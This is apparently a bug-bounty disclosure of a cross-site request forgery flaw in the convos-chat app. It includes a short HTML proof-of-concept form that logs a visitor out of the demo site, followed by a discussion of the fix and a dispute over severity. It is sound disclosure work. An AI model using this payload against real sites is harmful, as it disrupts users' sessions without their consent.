Cross-Site Request Forgery (CSRF) in convos-chat/convos
Reported on
Dec 11th 2021
Description
An attacker is able to log out a user if a logged-in user visits the attacker's website.
Proof of Concept
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.convos.chat/logout">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Impact
This vulnerability allows an attacker to force a logged-in user to log out unintentionally.
More Detail
One way a GET logout could be abused here is that a person (a competitor, perhaps :)) places an image tag with src="<your logout link>" anywhere on the internet; if a user of your site stumbles upon that page, they will be logged out without knowing it. This is why logout should be a POST protected by a CSRF token.
Note
While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.
Occurrences
@admin Please contact the maintainer at contact@convos.chat.
@dev696 - I have commented on the GitHub Issue! I have shared the report URL with them if they want to view the report directly. Otherwise, once they have added an e-mail to the SECURITY.md, they will receive a magic link to access the page.
@Jamie, I believe we can consider the shared email "contact@convos.chat" as the main contact, so you can share all the details. Also, the URL is private and cannot be viewed. Thanks for your support as always.
Thanks for reporting this through e-mail, instead of posting it online before having a chance to fix it.
I did consider this a minor issue. I think even bigger sites like Google also do not protect the /logout endpoint. Nevertheless, the fix was simple to add, so why not? :)
Hey @dev696,
A real researcher will not just copy all the content from other reports. You should try to write your reports yourself.
Furthermore, the severity for this vulnerability is not High, it's Medium (CVSS from 4.3 to 6.5, maybe). You can check it against some reports or CVEs. Convos's users will be shocked if they learn that their app has a High vulnerability when the impact is just logging out a user, with no effect on the account, just an annoyance!